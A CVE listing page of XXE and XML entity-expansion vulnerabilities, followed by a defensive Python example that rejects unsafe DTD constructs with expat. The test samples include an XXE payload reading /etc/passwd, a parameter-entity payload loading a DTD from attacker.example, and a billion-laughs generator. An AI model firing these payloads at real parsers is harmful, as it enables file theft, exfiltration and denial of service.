Total: 1209 CVEs (40 shown on this page)

| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 | Description |
|---|---|---|---|---|---|---|
| CVE-2024-49704 | | | 2024-12-10 | N/A | 5.5 MEDIUM | A vulnerability has been identified in COMOS V10.3 (All versions < V10.3.3.5.8), COMOS V10.4.0 (All versions), COMOS V10.4.1 (All versions), COMOS V10.4.2 (All versions), COMOS V10.4.3 (All versions < V10.4.3.0.47), COMOS V10.4.4 (All versions < V10.4.4.2), COMOS V10.4.4.1 (All versions < V10.4.4.1.21). The Generic Data Mapper, the Engineering Adapter, and the Engineering Interface improperly handle XML External Entity (XXE) entries when parsing configuration and mapping files. This could allow ... |
| CVE-2024-47582 | | | 2024-12-10 | N/A | 5.3 MEDIUM | Due to missing validation of XML input, an unauthenticated attacker could send malicious input to an endpoint, leading to an XML Entity Expansion attack. This causes limited impact on the availability of the application. |
| CVE-2024-40075 | | | 2024-12-02 | N/A | 4.3 MEDIUM | Laravel v11.x was discovered to contain an XML External Entity (XXE) vulnerability. |
| CVE-2024-52806 | | | 2024-12-02 | N/A | 8.3 HIGH | SimpleSAMLphp SAML2 library is a PHP library for SAML2-related functionality. When loading an (untrusted) XML document, for example the SAMLResponse, it is possible to induce an XXE. This vulnerability is fixed in 4.6.14 and 5.0.0-alpha.18. |
| CVE-2024-52596 | | | 2024-12-02 | N/A | N/A | SimpleSAMLphp xml-common is a set of common classes for handling XML structures. When loading an (untrusted) XML document, for example the SAMLResponse, it is possible to induce an XXE. This vulnerability is fixed in 1.19.0. |
| CVE-2024-52800 | | | 2024-11-29 | N/A | N/A | veraPDF is an open source PDF/A validation library. Executing policy checks using custom schematron files via the CLI invokes an XSL transformation that may theoretically lead to a remote code execution (RCE) vulnerability. This doesn't affect the standard validation and policy checks functionality, veraPDF's common use cases. Most veraPDF users don't insert any custom XSLT code into policy profiles, which are based on Schematron syntax rather than direct XSL transforms. For users who do, only l ... |
| CVE-2024-9044 | | | 2024-11-29 | N/A | N/A | An XML External Entity (XXE) vulnerability has been identified in Easy Tax Client Software 2023 1.2 and earlier across multiple platforms, including Windows, Linux, and macOS. |
| CVE-2018-16303 | 1 Pdf-xchange | 1 Pdf-xchange Editor | 2024-11-27 | 5.0 MEDIUM | 7.5 HIGH | PDF-XChange Editor through 7.0.326.1 allows remote attackers to cause a denial of service (resource consumption) via a crafted x:xmpmeta structure, a related issue to CVE-2003-1564. |
| CVE-2022-20938 | 1 Cisco | 1 Secure Firewall Management Center | 2024-11-26 | N/A | 4.3 MEDIUM | A vulnerability in the module import function of the administrative interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to view sensitive information. This vulnerability is due to insufficient validation of the XML syntax when importing a module. An attacker could exploit this vulnerability by supplying a specially crafted XML file to the function. A successful exploit could allow the attacker to read sensitive data that would normally n ... |
| CVE-2024-6961 | | | 2024-11-25 | N/A | 5.9 MEDIUM | RAIL documents are an XML-based format invented by Guardrails AI to enforce formatting checks on LLM outputs. Guardrails users that consume RAIL documents from external sources are vulnerable to XXE, which may cause leakage of internal file data via the SYSTEM entity. |
| CVE-2024-10218 | | | 2024-11-22 | N/A | N/A | XSS attack in mar.jar, Monitoring Archive Utility (MAR Utility), monitoringconsolecommon.jar in TIBCO Software Inc TIBCO Hawk and TIBCO Operational Intelligence |
| CVE-2024-6893 | 1 Journyx | 1 Journyx | 2024-11-21 | N/A | 7.5 HIGH | The "soap_cgi.pyc" API handler allows the XML body of SOAP requests to contain references to external entities. This allows an unauthenticated attacker to read local files, perform server-side request forgery, and overwhelm the web server resources. |
| CVE-2024-5625 | | | 2024-11-21 | N/A | 6.5 MEDIUM | Improper Restriction of XML External Entity Reference vulnerability in PruvaSoft Informatics Apinizer Management Console allows Data Serialization External Entities Blowup. This issue affects Apinizer Management Console: before 2024.05.1. |
| CVE-2024-3930 | 1 Perforce | 1 Akana Api | 2024-11-21 | N/A | 6.3 MEDIUM | In versions of Akana API Platform prior to 2024.1.0, a flaw resulting in XML External Entity (XXE) injection was discovered. |
| CVE-2024-38374 | | | 2024-11-21 | N/A | 7.5 HIGH | The CycloneDX core module provides a model representation of the SBOM along with utilities to assist in creating, validating, and parsing SBOMs. Before deserializing CycloneDX Bill of Materials in XML format, _cyclonedx-core-java_ leverages XPath expressions to determine the schema version of the BOM. The `DocumentBuilderFactory` used to evaluate XPath expressions was not configured securely, making the library vulnerable to XML External Entity (XXE) injection. This vulnerability has been fixed ... |
| CVE-2024-37388 | 1 Dnkorpushov | 1 Ebookmeta | 2024-11-21 | N/A | 9.1 CRITICAL | An XML External Entity (XXE) vulnerability in the ebookmeta.get_metadata function of lxml before v4.9.1 allows attackers to access sensitive information or cause a Denial of Service (DoS) via crafted XML input. |
| CVE-2024-34345 | | | 2024-11-21 | N/A | 8.1 HIGH | The CycloneDX JavaScript library contains the core functionality of OWASP CycloneDX for JavaScript. In 6.7.0, XML External Entity injections were possible when running the provided XML Validator on arbitrary input. This issue was fixed in version 6.7.1. |
| CVE-2024-29010 | | | 2024-11-21 | N/A | 7.1 HIGH | The XML document processed in the GMS ECM URL endpoint is vulnerable to XML external entity (XXE) injection, potentially resulting in the disclosure of sensitive information. This issue affects GMS: 9.3.4 and earlier versions. |
| CVE-2024-28039 | | | 2024-11-21 | N/A | 5.8 MEDIUM | An improper restriction of XML external entity references vulnerability exists in all releases of FitNesse, which allows a remote unauthenticated attacker to obtain sensitive information, alter data, or cause a denial-of-service (DoS) condition. |
| CVE-2024-27266 | 1 Ibm | 1 Maximo Application Suite | 2024-11-21 | N/A | 8.2 HIGH | IBM Maximo Application Suite 7.6.1.3 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 284566. |
| CVE-2024-24743 | 1 Sap | 1 Netweaver Application Server Java | 2024-11-21 | N/A | 8.6 HIGH | SAP NetWeaver AS Java (CAF - Guided Procedures), version 7.50, allows an unauthenticated attacker to submit a malicious request with a crafted XML file over the network, which when parsed will enable them to access sensitive files and data but not modify them. There are expansion limits in place so that availability is not affected. |
| CVE-2024-21796 | 1 Dfeg | 1 Electronic Deliverables Creation Support Tool | 2024-11-21 | N/A | 5.5 MEDIUM | Electronic Deliverables Creation Support Tool (Construction Edition) prior to Ver1.0.4 and Electronic Deliverables Creation Support Tool (Design & Survey Edition) prior to Ver1.0.4 improperly restrict XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker. |
| CVE-2024-1167 | 1 Seweurodrive | 1 Movitools Motionstudio | 2024-11-21 | N/A | 5.5 MEDIUM | When SEW-EURODRIVE MOVITOOLS MotionStudio processes XML information, unrestricted file access can occur. |
| CVE-2023-6836 | 1 Wso2 | 7 Api Manager, Api Manager Analytics, Api Microgateway and 4 more | 2024-11-21 | N/A | 4.6 MEDIUM | Multiple WSO2 products have been identified as vulnerable to an XML External Entity (XXE) attack, which abuses a widely available but rarely used feature of XML parsers to access sensitive information. |
| CVE-2023-6721 | 1 Europeana | 1 Repox | 2024-11-21 | N/A | 8.3 HIGH | An XXE vulnerability has been found in Repox, which allows a remote attacker to interfere with the application's XML data processing in the fileupload function, resulting in interaction between the attacker and the server's file system. |
| CVE-2023-6280 | 1 52north | 1 Wps | 2024-11-21 | N/A | 7.2 HIGH | An XXE (XML External Entity) vulnerability has been detected in 52North WPS affecting versions prior to 4.0.0-beta.11. This vulnerability allows the use of external entities in its WebProcessingService servlet for an attacker to retrieve files by making HTTP requests to the internal network. |
| CVE-2023-6194 | 1 Eclipse | 1 Memory Analyzer | 2024-11-21 | N/A | 2.8 LOW | In Eclipse Memory Analyzer versions 0.7 to 1.14.0, report definition XML files are not filtered to prohibit document type definition (DTD) references to external entities. This means that if a user chooses to use a malicious report definition XML file containing an external entity reference to generate a report, then Eclipse Memory Analyzer may access external files or URLs defined via a DTD in the report definition. |
| CVE-2023-6149 | 1 Qualys | 1 Web Application Screening | 2024-11-21 | N/A | 5.7 MEDIUM | Qualys Jenkins Plugin for WAS prior to and including version 2.0.11 was identified to be affected by a security flaw: a missing permission check while performing a connectivity check to Qualys Cloud Services. This allowed any user with login access to configure or edit jobs to utilize the plugin and configure a potentially rogue endpoint, via which it was possible to control the response for certain requests, which could be injected with XXE payloads leading to XXE while processing the respons ... |
| CVE-2023-5136 | 1 Ni | 4 Diadem, Flexlogger, Topografix Data Plugin and 1 more | 2024-11-21 | N/A | 5.5 MEDIUM | An incorrect permission assignment in the TopoGrafix DataPlugin for GPX could result in information disclosure. An attacker could exploit this vulnerability by getting a user to open a specially crafted data file. |
| CVE-2023-52252 | 1 Unifiedremote | 1 Unified Remote | 2024-11-21 | N/A | 9.8 CRITICAL | Unified Remote 3.13.0 allows remote attackers to execute arbitrary Lua code because of a wildcarded Access-Control-Allow-Origin for the Remote upload endpoint. |
| CVE-2023-50304 | 1 Ibm | 2 Engineering Requirements Management Doors, Engineering Requirements Management Doors Web Access | 2024-11-21 | N/A | 7.1 HIGH | IBM Engineering Requirements Management DOORS Web Access 9.7.2.8 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 273335. |
| CVE-2023-4554 | 3 Linux, Microsoft, Opentext | 3 Linux Kernel, Windows, Appbuilder | 2024-11-21 | N/A | 4.9 MEDIUM | Improper Restriction of XML External Entity Reference vulnerability in OpenText AppBuilder on Windows and Linux allows server-side request forgery and probing of system files. AppBuilder's XML processor is vulnerable to XML External Entity Processing (XXE), allowing an authenticated user to upload specially crafted XML files to induce server-side request forgery and disclose files local to the server that processes them. This issue affects AppBuilder: from 21.2 before 23.2. |
| CVE-2023-4218 | 1 Eclipse | 3 Eclipse Ide, Org.eclipse.core.runtime, Pde | 2024-11-21 | N/A | 5.0 MEDIUM | In Eclipse IDE versions < 2023-09 (4.29), some files with XML content are parsed in a way that is vulnerable to all sorts of XXE attacks. The user just needs to open any malicious project or update an open project with a vulnerable file (for example, to review a foreign repository or patch). |
| CVE-2023-49656 | 1 Jenkins | 1 Matlab | 2024-11-21 | N/A | 9.8 CRITICAL | Jenkins MATLAB Plugin 2.11.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks. |
| CVE-2023-48362 | 1 Apache | 1 Drill | 2024-11-21 | N/A | 8.8 HIGH | XXE in the XML Format Plugin in Apache Drill version 1.19.0 and greater allows a user to read any file on a remote file system or execute commands via a malicious XML file. Users are recommended to upgrade to version 1.21.2, which fixes this issue. |
| CVE-2023-46802 | 1 Nta | 1 E-tax | 2024-11-21 | N/A | 5.5 MEDIUM | e-Tax software Version 3.0.10 and earlier improperly restricts XML external entity references (XXE) due to the configuration of the embedded XML parser. By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker. |
| CVE-2023-46590 | 1 Siemens | 1 Siemens Opc Ua Modeling Editor | 2024-11-21 | N/A | 7.5 HIGH | A vulnerability has been identified in Siemens OPC UA Modelling Editor (SiOME) (All versions < V2.8). Affected products suffer from an XML external entity (XXE) injection vulnerability. This vulnerability could allow an attacker to interfere with an application's processing of XML data and read arbitrary files in the system. |
| CVE-2023-46502 | 1 Opencrx | 1 Opencrx | 2024-11-21 | N/A | 9.8 CRITICAL | An issue in openCRX v.5.2.2 allows a remote attacker to read internal files and perform server-side request forgery via an insecure DocumentBuilderFactory. |
| CVE-2023-46265 | 1 Ivanti | 1 Avalanche | 2024-11-21 | N/A | 9.8 CRITICAL | An unauthenticated attacker could abuse an XXE vulnerability in the Smart Device Server to leak data or perform Server-Side Request Forgery (SSRF). |
| CVE-2023-45612 | 1 Jetbrains | 1 Ktor | 2024-11-21 | N/A | 8.6 HIGH | In JetBrains Ktor before 2.3.5, the default configuration of ContentNegotiation with the XML format was vulnerable to XXE. |
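Nearly every entry in the list (the veraPDF XSLT case aside) comes down to an XML parser honouring DOCTYPE machinery on attacker-controlled input: external general entities (local file read, SSRF), external DTDs and parameter entities (out-of-band exfiltration), and nested internal entities (entity-expansion denial of service, as in the x:xmpmeta and "Entity Expansion" entries). The following is an added example, not code from any product in the table, showing how to refuse each of those at the DTD callbacks of Python's standard-library expat bindings, before any element content is processed. The policy thresholds, the class and function names, and the sample documents are assumptions made for the demonstration.

```python
"""XXE / entity-expansion guard on top of Python's standard-library expat bindings.

Added example, not code from any project in the CVE list above. The policy
defaults and the sample documents are assumptions chosen for illustration.
"""
import re
import xml.parsers.expat as expat


class UnsafeXml(ValueError):
    """Raised from the DTD callbacks, i.e. before any element content is handled."""


_ENTITY_REF = re.compile(r"&([^;&\s]+);")


class EntityGuard:
    """DTD callbacks that refuse the constructs behind the CVEs listed above."""

    def __init__(self, allow_doctype=False, max_expansion=50_000):
        self.allow_doctype = allow_doctype      # False: refuse any DOCTYPE (safest posture)
        self.max_expansion = max_expansion      # bytes a single internal entity may expand to
        self.internal = {}                      # entity name -> unexpanded replacement text
        self._sizes = {}

    def start_doctype(self, name, sysid, pubid, has_internal_subset):
        if not self.allow_doctype:
            raise UnsafeXml(f"DOCTYPE '{name}' refused in untrusted input")
        if sysid is not None or pubid is not None:
            # An external DTD would be fetched (file:// or http://) before any content is seen.
            raise UnsafeXml(f"external DTD refused: {sysid or pubid}")

    def entity_decl(self, name, is_param, value, base, sysid, pubid, notation):
        if is_param:
            # Parameter entities are the usual vehicle for out-of-band exfiltration.
            raise UnsafeXml(f"parameter entity '%{name};' refused")
        if value is None:
            # SYSTEM/PUBLIC general entity: local file read or SSRF once referenced.
            raise UnsafeXml(f"external entity '{name}' -> {sysid or pubid} refused")
        self.internal[name] = value

    def end_doctype(self):
        # Every internal entity is declared by now; bound its expansion before content parsing.
        for name in self.internal:
            size = self.expanded_size(name, frozenset())
            if size > self.max_expansion:
                raise UnsafeXml(f"entity '{name}' expands to {size} bytes (limit {self.max_expansion})")

    def expanded_size(self, name, stack):
        """Length of the fully expanded replacement text, computed without building it."""
        if name in stack:
            raise UnsafeXml(f"recursive entity '{name}'")
        if name in self._sizes:
            return self._sizes[name]
        value, total, last = self.internal[name], 0, 0
        for m in _ENTITY_REF.finditer(value):
            total += m.start() - last
            ref = m.group(1)
            # Nested internal entity: recurse. &amp;, &#x41; or undeclared: count literally.
            total += self.expanded_size(ref, stack | {name}) if ref in self.internal else len(m.group(0))
            last = m.end()
        total += len(value) - last
        self._sizes[name] = total
        return total

    def external_ref(self, context, base, sysid, pubid):
        # Belt and braces: expat never does I/O itself, it asks this handler first.
        raise UnsafeXml(f"external entity reference to {sysid or pubid} refused")


def parse_untrusted(data, **policy):
    """Parse XML of unknown origin; returns root name and text, or raises UnsafeXml."""
    guard = EntityGuard(**policy)
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = guard.start_doctype
    parser.EntityDeclHandler = guard.entity_decl
    parser.EndDoctypeDeclHandler = guard.end_doctype
    parser.ExternalEntityRefHandler = guard.external_ref
    root, text = [], []
    parser.StartElementHandler = lambda name, attrs: root.append(name) if not root else None
    parser.CharacterDataHandler = text.append
    parser.Parse(data, True)
    return {"root": root[0], "text": "".join(text)}


def verdict(data, **policy):
    """'accepted', or 'rejected: <reason>' from the guard."""
    try:
        parse_untrusted(data, **policy)
        return "accepted"
    except UnsafeXml as exc:
        return f"rejected: {exc}"


# Constructed sample inputs (not captured traffic).
PLAIN = b"<Response><Assertion>user@example.com</Assertion></Response>"
XXE_FILE_READ = b'<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><r>&xxe;</r>'
PARAM_ENTITY_OOB = b'<!DOCTYPE r [<!ENTITY % ext SYSTEM "http://attacker.example/evil.dtd">]><r/>'


def laughs(depth, fanout=10):
    """Constructed 'billion laughs' document: lol<depth> expands to 3 * fanout**depth bytes."""
    decls = ['<!ENTITY lol0 "lol">']
    for i in range(1, depth + 1):
        refs = f"&lol{i - 1};" * fanout
        decls.append(f'<!ENTITY lol{i} "{refs}">')
    return f"<!DOCTYPE r [{''.join(decls)}]><r>&lol{depth};</r>".encode()


def demo():
    """Apply the policy to each sample; returns sample name -> verdict string."""
    return {
        "plain": verdict(PLAIN),
        "xxe_strict": verdict(XXE_FILE_READ),
        "xxe_doctype_allowed": verdict(XXE_FILE_READ, allow_doctype=True),
        "param_entity": verdict(PARAM_ENTITY_OOB, allow_doctype=True),
        "laughs_depth3": verdict(laughs(3), allow_doctype=True),
        "laughs_depth5": verdict(laughs(5), allow_doctype=True),
    }
```

`allow_doctype=False` is the equivalent of the `disallow-doctype-decl` feature on a Java `DocumentBuilderFactory` (the setting missing in the CycloneDX, openCRX and Jenkins entries) and is the right default for a SAMLResponse, a SOAP body or an uploaded mapping file. The expansion bound only matters when an internal subset must be tolerated; it is computed from the declarations alone, so a document that would expand to gigabytes is refused without allocating anything, and the recursion check catches the self-referencing case that a well-formedness error would otherwise only report after the fact. Rejecting the declaration is also parser-independent: libxml2 (PHP, lxml) and the JDK parsers expose the same three knobs (DOCTYPE, external entities, parameter entities), and the check should be applied at all three rather than relying on any one library's defaults.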